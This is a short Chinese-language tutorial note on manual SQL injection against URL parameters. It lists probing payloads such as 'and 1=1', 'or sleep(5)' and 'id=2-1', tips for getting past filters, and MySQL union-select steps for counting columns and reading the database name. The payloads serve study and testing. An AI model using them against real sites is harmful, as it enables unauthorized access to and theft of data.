SQL注入原理;
用户输入的数字被当作代码执行
在URL栏中进行手注
判断方法:
原始的方法:
and 1=1 //页面正常
and 1=2 //页面不正常 //在被拦截的可能性高
简单的方法:
加’ 看是否报错
我的方法:
如果是数字型传参,可以尝试-1
例如:
http://www.xxx.com/new.php?id=1 页面显示id=1的新闻
http://www.xxx.com/new.php?id=2-1 页面显示id=1的新闻
and 1=1 and 1=2 被拦截的可能性太高了
可以尝试 and -1=-1 and -1=-2 and 1>0 or 1=1
或者直接 or sleep(5)
**
显错注入联合查询的基本流程;
**
是否存在注入点>猜解字段数>联合查询找出输出点>用系统自带库查表名,字段名>查询我们需要的字段
MYSQL
判断当前页面字段总数
and 1=1 order by 1,2,3,4,5……
判断显示位
and 1=2 union select 1,2,3,4,5,6,7……
查当前数据库
and 1=2 union select 1,2,database()